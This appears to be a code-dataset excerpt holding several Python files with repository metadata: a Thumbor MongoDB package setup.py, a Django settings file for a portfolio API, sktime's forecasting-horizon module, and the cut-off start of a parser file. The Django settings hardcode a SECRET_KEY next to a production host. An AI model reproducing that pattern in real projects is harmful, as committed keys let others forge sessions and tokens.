1c3c78ab9027a81c10ad54d82ba3a67d27d777c0 | 976 | py | Python | setup.py | allanlei/tc-mongodb | 28d09245fe81762cf4c1ba9d054f9a2a38735c6d | [
"MIT"
] | 5 | 2016-08-31T04:15:31.000Z | 2018-11-02T19:33:22.000Z | setup.py | allanlei/tc-mongodb | 28d09245fe81762cf4c1ba9d054f9a2a38735c6d | [
"MIT"
] | 3 | 2018-09-13T13:55:14.000Z | 2022-01-23T20:52:02.000Z | setup.py | allanlei/tc-mongodb | 28d09245fe81762cf4c1ba9d054f9a2a38735c6d | [
"MIT"
] | 7 | 2016-08-31T04:15:42.000Z | 2019-02-12T07:42:39.000Z | import os
from setuptools import setup, find_packages
try:
import pypandoc
long_description = pypandoc.convert('README.md', 'rst')
except (IOError, ImportError):
long_description = 'Thumbor mongodb storage adapters'
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="tc_mongodb",
version="5.1.0",
author="Thumbor Community",
description=("Thumbor thumbor storage adapters"),
license="MIT",
keywords="thumbor mongodb mongo",
url="https://github.com/thumbor-community/mongodb",
packages=[
'tc_mongodb',
'tc_mongodb.storages',
'tc_mongodb.result_storages'
],
long_description=long_description,
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
],
install_requires=[
'thumbor>=5.0.0',
'pymongo'
]
)
| 25.025641 | 70 | 0.645492 | import os
from setuptools import setup, find_packages
try:
import pypandoc
long_description = pypandoc.convert('README.md', 'rst')
except (IOError, ImportError):
long_description = 'Thumbor mongodb storage adapters'
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name="tc_mongodb",
version="5.1.0",
author="Thumbor Community",
description=("Thumbor thumbor storage adapters"),
license="MIT",
keywords="thumbor mongodb mongo",
url="https://github.com/thumbor-community/mongodb",
packages=[
'tc_mongodb',
'tc_mongodb.storages',
'tc_mongodb.result_storages'
],
long_description=long_description,
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
],
install_requires=[
'thumbor>=5.0.0',
'pymongo'
]
)
| true | true |
1c3c793af2a546c2660b89498cfa597007dc82f5 | 3,406 | py | Python | portfolio_api/settings.py | rafsaf/rest_api_for_portfolio | 2b07aca65cbe2d81f3f862fd024a2e0c5f20c83f | [
"MIT"
] | null | null | null | portfolio_api/settings.py | rafsaf/rest_api_for_portfolio | 2b07aca65cbe2d81f3f862fd024a2e0c5f20c83f | [
"MIT"
] | null | null | null | portfolio_api/settings.py | rafsaf/rest_api_for_portfolio | 2b07aca65cbe2d81f3f862fd024a2e0c5f20c83f | [
"MIT"
] | null | null | null | """
Django settings for portfolio_api project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '1+&12121212ttt5SSASda232fd8s8ad7sda8*l_5)mmnz*m7lak_gj345u2svsu+jw)mf)tf^8%oei_o=)8k'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ['rafsaf1.eu.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
    # Project and third-party apps
    'projects',
    'rest_framework',  # Django REST Framework (API views/serializers)
    'corsheaders',  # django-cors-headers; paired with CORS_ALLOWED_ORIGINS below
    # Django contrib apps
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ALLOWED_ORIGINS = [
"http://localhost:3000",
]
ROOT_URLCONF = 'portfolio_api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en'
TIME_ZONE = 'Europe/Warsaw'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_ROOT = BASE_DIR / 'static/'
STATIC_URL = '/static/'
MEDIA_ROOT = BASE_DIR / 'media/'
MEDIA_URL = '/media/'
| 25.609023 | 99 | 0.701116 |
from pathlib import Path
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = '1+&12121212ttt5SSASda232fd8s8ad7sda8*l_5)mmnz*m7lak_gj345u2svsu+jw)mf)tf^8%oei_o=)8k'
DEBUG = False
ALLOWED_HOSTS = ['rafsaf1.eu.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'projects',
'rest_framework',
'corsheaders',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ALLOWED_ORIGINS = [
"http://localhost:3000",
]
ROOT_URLCONF = 'portfolio_api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en'
TIME_ZONE = 'Europe/Warsaw'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_ROOT = BASE_DIR / 'static/'
STATIC_URL = '/static/'
MEDIA_ROOT = BASE_DIR / 'media/'
MEDIA_URL = '/media/'
| true | true |
1c3c7ae12764bbeb2b2498e4516c89ae1557bf09 | 17,526 | py | Python | sktime/forecasting/base/_fh.py | bilal-196/sktime | 87e92e51f9c4cd399d9438c5c06e1364ec409134 | [
"BSD-3-Clause"
] | null | null | null | sktime/forecasting/base/_fh.py | bilal-196/sktime | 87e92e51f9c4cd399d9438c5c06e1364ec409134 | [
"BSD-3-Clause"
] | null | null | null | sktime/forecasting/base/_fh.py | bilal-196/sktime | 87e92e51f9c4cd399d9438c5c06e1364ec409134 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
__author__ = ["mloning", "fkiraly"]
__all__ = ["ForecastingHorizon"]
from functools import lru_cache
import numpy as np
import pandas as pd
from sktime.utils.datetime import _coerce_duration_to_int
from sktime.utils.datetime import _get_freq
from sktime.utils.validation.series import VALID_INDEX_TYPES
RELATIVE_TYPES = (pd.Int64Index, pd.RangeIndex)
ABSOLUTE_TYPES = (pd.Int64Index, pd.RangeIndex, pd.DatetimeIndex, pd.PeriodIndex)
assert set(RELATIVE_TYPES).issubset(VALID_INDEX_TYPES)
assert set(ABSOLUTE_TYPES).issubset(VALID_INDEX_TYPES)
DELEGATED_METHODS = (
"__sub__",
"__add__",
"__mul__",
"__div__",
"__divmod__",
"__pow__",
"__gt__",
"__ge__",
"__ne__",
"__lt__",
"__eq__",
"__le__",
"__radd__",
"__rsub__",
"__rmul__",
"__rdiv__",
"__rmod__",
"__rdivmod__",
"__rpow__",
"__getitem__",
"__len__",
"max",
"min",
)
def _delegator(method):
"""Decorate ForecastingHorizon with pandas.index methods.
Helper function to automatically decorate ForecastingHorizon class with
methods from pandas.Index and delegate method calls to wrapped pandas.Index
object.
"""
def delegated(obj, *args, **kwargs):
return getattr(obj.to_pandas(), method)(*args, **kwargs)
return delegated
def _check_values(values):
    """Validate forecasting horizon values and coerce to pandas.Index type.

    Parameters
    ----------
    values : int, list, array, certain pd.Index types
        Forecasting horizon with steps ahead to predict.

    Raises
    ------
    TypeError : if values type is not supported
    ValueError : if values contain duplicates

    Returns
    -------
    values : pd.Index
        Sorted and validated forecasting horizon values.
    """
    # If values are one of the supported pandas index types we don't have to
    # do anything, as the forecasting horizon directly wraps the index. Note
    # that isinstance() does not work here, because index types inherit from
    # each other, hence we check for exact type equality.
    if type(values) in VALID_INDEX_TYPES:
        pass
    # convert single integer to pandas index, no further checks needed
    elif isinstance(values, (int, np.integer)):
        # BUGFIX: `np.int` was deprecated in NumPy 1.20 and removed in 1.24;
        # it was only an alias for the builtin `int`, which we use instead.
        return pd.Int64Index([values], dtype=int)
    # convert np.array or list to pandas index
    elif isinstance(values, (list, np.ndarray)):
        values = pd.Int64Index(values, dtype=int)
    # otherwise, raise type error
    else:
        valid_types = (
            "int",
            "np.array",
            "list",
            *[f"pd.{index_type.__name__}" for index_type in VALID_INDEX_TYPES],
        )
        raise TypeError(
            f"Invalid `fh`. The type of the passed `fh` values is not supported. "
            f"Please use one of {valid_types}, but found: {type(values)}"
        )

    # check values does not contain duplicates
    if len(values) != values.nunique():
        raise ValueError(
            "Invalid `fh`. The `fh` values must not contain any duplicates."
        )

    # return sorted values
    return values.sort_values()
class ForecastingHorizon:
    """Forecasting horizon.

    Parameters
    ----------
    values : pd.Index, np.array, list or int
        Values of forecasting horizon
    is_relative : bool, optional (default=None)
        - If True, a relative ForecastingHorizon is created:
                values are relative to end of training series.
        - If False, an absolute ForecastingHorizon is created:
                values are absolute.
        - if None, the flag is determined automatically:
            relative, if values are of supported relative index type
            absolute, if not relative and values of supported absolute index type
    """

    def __new__(cls, values=None, is_relative=None):
        """Create a new ForecastingHorizon object."""
        # We want the ForecastingHorizon class to be an extension of the
        # pandas index, but since subclassing pandas indices is not
        # straightforward, we wrap the index object instead. In order to
        # still support the basic methods of a pandas index, we dynamically
        # add some basic methods and delegate the method calls to the wrapped
        # index object.
        for method in DELEGATED_METHODS:
            setattr(cls, method, _delegator(method))
        return object.__new__(cls)

    def __init__(self, values=None, is_relative=True):
        # NOTE(review): the class docstring documents `is_relative=None` as
        # the default, but the signature defaults to True; kept as-is for
        # backward compatibility — confirm intended default upstream.
        if is_relative is not None and not isinstance(is_relative, bool):
            raise TypeError("`is_relative` must be a boolean or None")
        values = _check_values(values)

        # check types, note that isinstance() does not work here because index
        # types inherit from each other, hence we check for type equality
        error_msg = (
            f"`values` type is not compatible with `is_relative=" f"{is_relative}`."
        )
        if is_relative is None:
            if type(values) in RELATIVE_TYPES:
                is_relative = True
            elif type(values) in ABSOLUTE_TYPES:
                is_relative = False
            else:
                # BUGFIX: the original concatenated a type object with a str
                # (`type(values) + "..."`), which itself raises a TypeError
                # with a confusing message; format explicitly instead.
                raise TypeError(
                    f"{type(values)} is not a supported fh index type"
                )
        if is_relative:
            if not type(values) in RELATIVE_TYPES:
                raise TypeError(error_msg)
        else:
            if not type(values) in ABSOLUTE_TYPES:
                raise TypeError(error_msg)

        self._values = values
        self._is_relative = is_relative

    def _new(self, values=None, is_relative=None):
        """Construct new ForecastingHorizon based on current object.

        Parameters
        ----------
        values : pd.Index, np.array, list or int
            Values of forecasting horizon
        is_relative : bool, optional (default=same as self.is_relative)
            - If None, determined automatically: same as self.is_relative
            - If True, values are relative to end of training series.
            - If False, values are absolute.

        Returns
        -------
        ForecastingHorizon
            New ForecastingHorizon based on current object
        """
        if values is None:
            values = self._values
        if is_relative is None:
            is_relative = self.is_relative
        return type(self)(values, is_relative)

    @property
    def is_relative(self):
        """Whether forecasting horizon is relative.

        Returns
        -------
        is_relative : bool
        """
        return self._is_relative

    def to_pandas(self):
        """Return underlying values as pd.Index.

        Returns
        -------
        fh : pd.Index
        """
        return self._values

    def to_numpy(self, **kwargs):
        """Return underlying values as np.array.

        Parameters
        ----------
        **kwargs : dict of kwargs
            kwargs passed to `to_numpy()` of wrapped pandas index.

        Returns
        -------
        fh : np.ndarray
        """
        return self.to_pandas().to_numpy(**kwargs)

    # We cache the results from `to_relative()` and `to_absolute()` calls to speed up
    # computations, as these are the basic methods and often required internally when
    # calling different methods.
    # NOTE(review): `lru_cache` on instance methods keys on `self` and keeps
    # every instance alive for the cache's lifetime (flake8-bugbear B019);
    # kept as-is to preserve the existing caching semantics.
    @lru_cache(typed=True)
    def to_relative(self, cutoff=None):
        """Return relative values.

        Parameters
        ----------
        cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
            Cutoff value is required to convert a relative forecasting
            horizon to an absolute one and vice versa.

        Returns
        -------
        fh : ForecastingHorizon
            Relative representation of forecasting horizon
        """
        if self.is_relative:
            return self._new()

        else:
            absolute = self.to_pandas()
            _check_cutoff(cutoff, absolute)

            if isinstance(absolute, pd.DatetimeIndex):
                # We cannot use the freq from the the ForecastingHorizon itself (or its
                # wrapped pd.DatetimeIndex) because it may be none for non-regular
                # indices, so instead we use the freq of cutoff.
                freq = _get_freq(cutoff)

                # coerce to pd.Period for reliable arithmetics and computations of
                # time deltas
                absolute = _coerce_to_period(absolute, freq)
                cutoff = _coerce_to_period(cutoff, freq)

            # Compute relative values
            relative = absolute - cutoff

            # Coerce durations (time deltas) into integer values for given frequency
            if isinstance(absolute, (pd.PeriodIndex, pd.DatetimeIndex)):
                relative = _coerce_duration_to_int(relative, freq=_get_freq(cutoff))

            return self._new(relative, is_relative=True)

    @lru_cache(typed=True)
    def to_absolute(self, cutoff):
        """Convert ForecastingHorizon to absolute and return.

        Parameters
        ----------
        cutoff : pd.Period, pd.Timestamp, int
            Cutoff value is required to convert a relative forecasting
            horizon to an absolute one and vice versa.

        Returns
        -------
        fh : ForecastingHorizon
            Absolute representation of forecasting horizon
        """
        if not self.is_relative:
            return self._new()

        else:
            relative = self.to_pandas()
            _check_cutoff(cutoff, relative)
            is_timestamp = isinstance(cutoff, pd.Timestamp)

            if is_timestamp:
                # coerce to pd.Period for reliable arithmetic operations and
                # computations of time deltas
                cutoff = _coerce_to_period(cutoff)

            absolute = cutoff + relative

            if is_timestamp:
                # coerce back to DatetimeIndex after operation
                freq = _get_freq(cutoff)
                absolute = absolute.to_timestamp(freq)

            return self._new(absolute, is_relative=False)

    def to_absolute_int(self, start, cutoff=None):
        """Return absolute values as zero-based integer index starting from `start`.

        Parameters
        ----------
        start : pd.Period, pd.Timestamp, int
            Start value returned as zero.
        cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
            Cutoff value is required to convert a relative forecasting
            horizon to an absolute one and vice versa.

        Returns
        -------
        fh : ForecastingHorizon
            Absolute representation of forecasting horizon as zero-based
            integer index
        """
        # We here check the start value, the cutoff value is checked when we use it
        # to convert the horizon to the absolute representation below
        absolute = self.to_absolute(cutoff).to_pandas()
        _check_start(start, absolute)

        # Note: We should here also coerce to periods for more reliable arithmetic
        # operations as in `to_relative` but currently doesn't work with
        # `update_predict` and incomplete time indices where the `freq` information
        # is lost, see comment on issue #534
        integers = absolute - start

        if isinstance(absolute, (pd.PeriodIndex, pd.DatetimeIndex)):
            integers = _coerce_duration_to_int(integers, freq=_get_freq(cutoff))

        return self._new(integers, is_relative=False)

    def to_in_sample(self, cutoff=None):
        """Return in-sample index values of fh.

        Parameters
        ----------
        cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
            Cutoff value is required to convert a relative forecasting
            horizon to an absolute one and vice versa.

        Returns
        -------
        fh : ForecastingHorizon
            In-sample values of forecasting horizon
        """
        is_in_sample = self._is_in_sample(cutoff)
        in_sample = self.to_pandas()[is_in_sample]
        return self._new(in_sample)

    def to_out_of_sample(self, cutoff=None):
        """Return out-of-sample values of fh.

        Parameters
        ----------
        cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
            Cutoff value is required to convert a relative forecasting
            horizon to an absolute one and vice versa.

        Returns
        -------
        fh : ForecastingHorizon
            Out-of-sample values of forecasting horizon
        """
        is_out_of_sample = self._is_out_of_sample(cutoff)
        out_of_sample = self.to_pandas()[is_out_of_sample]
        return self._new(out_of_sample)

    def _is_in_sample(self, cutoff=None):
        """Get index location of in-sample values."""
        return self.to_relative(cutoff).to_pandas() <= 0

    def is_all_in_sample(self, cutoff=None):
        """Whether or not the fh is purely in-sample given cutoff, yes/no.

        Parameters
        ----------
        cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
            Cutoff value is required to convert a relative forecasting
            horizon to an absolute one and vice versa.

        Returns
        -------
        ret : bool
            True if the forecasting horizon is purely in-sample for given cutoff.
        """
        return sum(self._is_in_sample(cutoff)) == len(self)

    def _is_out_of_sample(self, cutoff=None):
        """Get index location of out-of-sample values."""
        # return ~self._in_sample_idx(cutoff)
        return self.to_relative(cutoff).to_pandas() > 0

    def is_all_out_of_sample(self, cutoff=None):
        """Whether or not the fh is purely out-of-sample given cutoff, yes/no.

        Parameters
        ----------
        cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
            Cutoff value is required to convert a relative forecasting
            horizon to an absolute one and vice versa.

        Returns
        -------
        ret : bool
            True if the forecasting horizon is purely out-of-sample for given
            cutoff.
        """
        return sum(self._is_out_of_sample(cutoff)) == len(self)

    def to_indexer(self, cutoff=None, from_cutoff=True):
        """Return zero-based indexer values for easy indexing into arrays.

        Parameters
        ----------
        cutoff : pd.Period, pd.Timestamp, int, optional (default=None)
            Cutoff value is required to convert a relative forecasting
            horizon to an absolute one and vice versa.
        from_cutoff : bool, optional (default=True)
            - If True, zero-based relative to cutoff.
            - If False, zero-based relative to first value in forecasting
            horizon.

        Returns
        -------
        fh : pd.Index
            Indexer
        """
        if from_cutoff:
            return self.to_relative(cutoff).to_pandas() - 1
        else:
            relative = self.to_relative(cutoff)
            return relative - relative.to_pandas()[0]

    def __repr__(self):
        """Generate repr based on wrapped index repr."""
        class_name = self.__class__.__name__
        pandas_repr = repr(self.to_pandas()).split("(")[-1].strip(")")
        return f"{class_name}({pandas_repr}, is_relative={self.is_relative})"
def _check_cutoff(cutoff, index):
"""Check whether cutoff is compatible with fh index type.
Helper function to check if the cutoff contains all necessary information and is
compatible with the time index of the forecasting horizon
"""
if cutoff is None:
raise ValueError("`cutoff` must be given, but found none.")
if isinstance(index, pd.PeriodIndex):
assert isinstance(cutoff, pd.Period)
assert index.freqstr == cutoff.freqstr
if isinstance(index, pd.DatetimeIndex):
assert isinstance(cutoff, pd.Timestamp)
if not hasattr(cutoff, "freqstr") or cutoff.freqstr is None:
raise AttributeError(
"The `freq` attribute of the time index is required, "
"but found: None. Please specify the `freq` argument "
"when setting the time index."
)
# For indices of type DatetimeIndex with irregular steps, frequency will be
# None
if index.freqstr is not None:
assert cutoff.freqstr == index.freqstr
def _check_start(start, index):
if isinstance(index, pd.PeriodIndex):
assert isinstance(start, pd.Period)
assert index.freqstr == start.freqstr
if isinstance(index, pd.DatetimeIndex):
assert isinstance(start, pd.Timestamp)
def _coerce_to_period(x, freq=None):
"""Coerce compatible index type to pd.PeriodIndex.
Helper function to coerce pd.Timestamp to pd.Period or pd.DatetimeIndex to
pd.PeriodIndex for more reliable arithmetic operations with time indices
"""
if freq is None:
freq = _get_freq(x)
try:
return x.to_period(freq)
except (ValueError, AttributeError) as e:
msg = str(e)
if "Invalid frequency" in msg or "_period_dtype_code" in msg:
raise ValueError(
"Invalid frequency. Please select a frequency that can "
"be converted to a regular `pd.PeriodIndex`. For other "
"frequencies, basic arithmetic operation to compute "
"durations currently do not work reliably."
)
else:
raise
| 34.097276 | 87 | 0.618966 |
__author__ = ["mloning", "fkiraly"]
__all__ = ["ForecastingHorizon"]
from functools import lru_cache
import numpy as np
import pandas as pd
from sktime.utils.datetime import _coerce_duration_to_int
from sktime.utils.datetime import _get_freq
from sktime.utils.validation.series import VALID_INDEX_TYPES
RELATIVE_TYPES = (pd.Int64Index, pd.RangeIndex)
ABSOLUTE_TYPES = (pd.Int64Index, pd.RangeIndex, pd.DatetimeIndex, pd.PeriodIndex)
assert set(RELATIVE_TYPES).issubset(VALID_INDEX_TYPES)
assert set(ABSOLUTE_TYPES).issubset(VALID_INDEX_TYPES)
DELEGATED_METHODS = (
"__sub__",
"__add__",
"__mul__",
"__div__",
"__divmod__",
"__pow__",
"__gt__",
"__ge__",
"__ne__",
"__lt__",
"__eq__",
"__le__",
"__radd__",
"__rsub__",
"__rmul__",
"__rdiv__",
"__rmod__",
"__rdivmod__",
"__rpow__",
"__getitem__",
"__len__",
"max",
"min",
)
def _delegator(method):
def delegated(obj, *args, **kwargs):
return getattr(obj.to_pandas(), method)(*args, **kwargs)
return delegated
def _check_values(values):
# to do
# anything as the forecasting horizon directly wraps the index, note that
# isinstance() does not work here, because index types inherit from each
# other,
# hence we check for type equality here
if type(values) in VALID_INDEX_TYPES:
pass
# convert single integer to pandas index, no further checks needed
elif isinstance(values, (int, np.integer)):
return pd.Int64Index([values], dtype=np.int)
# convert np.array or list to pandas index
elif isinstance(values, (list, np.ndarray)):
values = pd.Int64Index(values, dtype=np.int)
# otherwise, raise type error
else:
valid_types = (
"int",
"np.array",
"list",
*[f"pd.{index_type.__name__}" for index_type in VALID_INDEX_TYPES],
)
raise TypeError(
f"Invalid `fh`. The type of the passed `fh` values is not supported. "
f"Please use one of {valid_types}, but found: {type(values)}"
)
# check values does not contain duplicates
if len(values) != values.nunique():
raise ValueError(
"Invalid `fh`. The `fh` values must not contain any duplicates."
)
# return sorted values
return values.sort_values()
class ForecastingHorizon:
def __new__(cls, values=None, is_relative=None):
# We want the ForecastingHorizon class to be an extension of the
# pandas index, but since subclassing pandas indices is not
# straightforward, we wrap the index object instead. In order to
# still support the basic methods of a pandas index, we dynamically
# add some basic methods and delegate the method calls to the wrapped
# index object.
for method in DELEGATED_METHODS:
setattr(cls, method, _delegator(method))
return object.__new__(cls)
def __init__(self, values=None, is_relative=True):
if is_relative is not None and not isinstance(is_relative, bool):
raise TypeError("`is_relative` must be a boolean or None")
values = _check_values(values)
# check types, note that isinstance() does not work here because index
# types inherit from each other, hence we check for type equality
error_msg = (
f"`values` type is not compatible with `is_relative=" f"{is_relative}`."
)
if is_relative is None:
if type(values) in RELATIVE_TYPES:
is_relative = True
elif type(values) in ABSOLUTE_TYPES:
is_relative = False
else:
raise TypeError(type(values) + "is not a supported fh index type")
if is_relative:
if not type(values) in RELATIVE_TYPES:
raise TypeError(error_msg)
else:
if not type(values) in ABSOLUTE_TYPES:
raise TypeError(error_msg)
self._values = values
self._is_relative = is_relative
def _new(self, values=None, is_relative=None):
if values is None:
values = self._values
if is_relative is None:
is_relative = self.is_relative
return type(self)(values, is_relative)
@property
def is_relative(self):
return self._is_relative
def to_pandas(self):
return self._values
def to_numpy(self, **kwargs):
return self.to_pandas().to_numpy(**kwargs)
# We cache the results from `to_relative()` and `to_absolute()` calls to speed up
# computations, as these are the basic methods and often required internally when
# calling different methods.
@lru_cache(typed=True)
def to_relative(self, cutoff=None):
if self.is_relative:
return self._new()
else:
absolute = self.to_pandas()
_check_cutoff(cutoff, absolute)
if isinstance(absolute, pd.DatetimeIndex):
# We cannot use the freq from the the ForecastingHorizon itself (or its
# wrapped pd.DatetimeIndex) because it may be none for non-regular
# indices, so instead we use the freq of cutoff.
freq = _get_freq(cutoff)
# coerce to pd.Period for reliable arithmetics and computations of
# time deltas
absolute = _coerce_to_period(absolute, freq)
cutoff = _coerce_to_period(cutoff, freq)
# Compute relative values
relative = absolute - cutoff
# Coerce durations (time deltas) into integer values for given frequency
if isinstance(absolute, (pd.PeriodIndex, pd.DatetimeIndex)):
relative = _coerce_duration_to_int(relative, freq=_get_freq(cutoff))
return self._new(relative, is_relative=True)
@lru_cache(typed=True)
def to_absolute(self, cutoff):
if not self.is_relative:
return self._new()
else:
relative = self.to_pandas()
_check_cutoff(cutoff, relative)
is_timestamp = isinstance(cutoff, pd.Timestamp)
if is_timestamp:
# coerce to pd.Period for reliable arithmetic operations and
# computations of time deltas
cutoff = _coerce_to_period(cutoff)
absolute = cutoff + relative
if is_timestamp:
# coerce back to DatetimeIndex after operation
freq = _get_freq(cutoff)
absolute = absolute.to_timestamp(freq)
return self._new(absolute, is_relative=False)
def to_absolute_int(self, start, cutoff=None):
# We here check the start value, the cutoff value is checked when we use it
# to convert the horizon to the absolute representation below
absolute = self.to_absolute(cutoff).to_pandas()
_check_start(start, absolute)
# Note: We should here also coerce to periods for more reliable arithmetic
# operations as in `to_relative` but currently doesn't work with
integers = absolute - start
if isinstance(absolute, (pd.PeriodIndex, pd.DatetimeIndex)):
integers = _coerce_duration_to_int(integers, freq=_get_freq(cutoff))
return self._new(integers, is_relative=False)
def to_in_sample(self, cutoff=None):
is_in_sample = self._is_in_sample(cutoff)
in_sample = self.to_pandas()[is_in_sample]
return self._new(in_sample)
def to_out_of_sample(self, cutoff=None):
is_out_of_sample = self._is_out_of_sample(cutoff)
out_of_sample = self.to_pandas()[is_out_of_sample]
return self._new(out_of_sample)
def _is_in_sample(self, cutoff=None):
return self.to_relative(cutoff).to_pandas() <= 0
def is_all_in_sample(self, cutoff=None):
return sum(self._is_in_sample(cutoff)) == len(self)
def _is_out_of_sample(self, cutoff=None):
return self.to_relative(cutoff).to_pandas() > 0
def is_all_out_of_sample(self, cutoff=None):
return sum(self._is_out_of_sample(cutoff)) == len(self)
def to_indexer(self, cutoff=None, from_cutoff=True):
if from_cutoff:
return self.to_relative(cutoff).to_pandas() - 1
else:
relative = self.to_relative(cutoff)
return relative - relative.to_pandas()[0]
def __repr__(self):
class_name = self.__class__.__name__
pandas_repr = repr(self.to_pandas()).split("(")[-1].strip(")")
return f"{class_name}({pandas_repr}, is_relative={self.is_relative})"
def _check_cutoff(cutoff, index):
if cutoff is None:
raise ValueError("`cutoff` must be given, but found none.")
if isinstance(index, pd.PeriodIndex):
assert isinstance(cutoff, pd.Period)
assert index.freqstr == cutoff.freqstr
if isinstance(index, pd.DatetimeIndex):
assert isinstance(cutoff, pd.Timestamp)
if not hasattr(cutoff, "freqstr") or cutoff.freqstr is None:
raise AttributeError(
"The `freq` attribute of the time index is required, "
"but found: None. Please specify the `freq` argument "
"when setting the time index."
)
if index.freqstr is not None:
assert cutoff.freqstr == index.freqstr
def _check_start(start, index):
if isinstance(index, pd.PeriodIndex):
assert isinstance(start, pd.Period)
assert index.freqstr == start.freqstr
if isinstance(index, pd.DatetimeIndex):
assert isinstance(start, pd.Timestamp)
def _coerce_to_period(x, freq=None):
if freq is None:
freq = _get_freq(x)
try:
return x.to_period(freq)
except (ValueError, AttributeError) as e:
msg = str(e)
if "Invalid frequency" in msg or "_period_dtype_code" in msg:
raise ValueError(
"Invalid frequency. Please select a frequency that can "
"be converted to a regular `pd.PeriodIndex`. For other "
"frequencies, basic arithmetic operation to compute "
"durations currently do not work reliably."
)
else:
raise
| true | true |
1c3c7bb344aae3a98a185fc2c2dd8d5249cc62d9 | 17,483 | py | Python | src/trparser.py | traildb/trck | 64304f00f352fc023ef092c6c5332dfd3963fda7 | [
"MIT"
] | 53 | 2017-03-21T02:59:31.000Z | 2021-07-26T10:05:00.000Z | src/trparser.py | traildb/trck | 64304f00f352fc023ef092c6c5332dfd3963fda7 | [
"MIT"
] | 16 | 2017-04-10T19:29:56.000Z | 2018-06-28T17:07:18.000Z | src/trparser.py | traildb/trck | 64304f00f352fc023ef092c6c5332dfd3963fda7 | [
"MIT"
] | 14 | 2017-03-21T18:03:21.000Z | 2019-02-08T11:51:21.000Z | from __future__ import print_function
import ply.lex as lex
from itertools import groupby
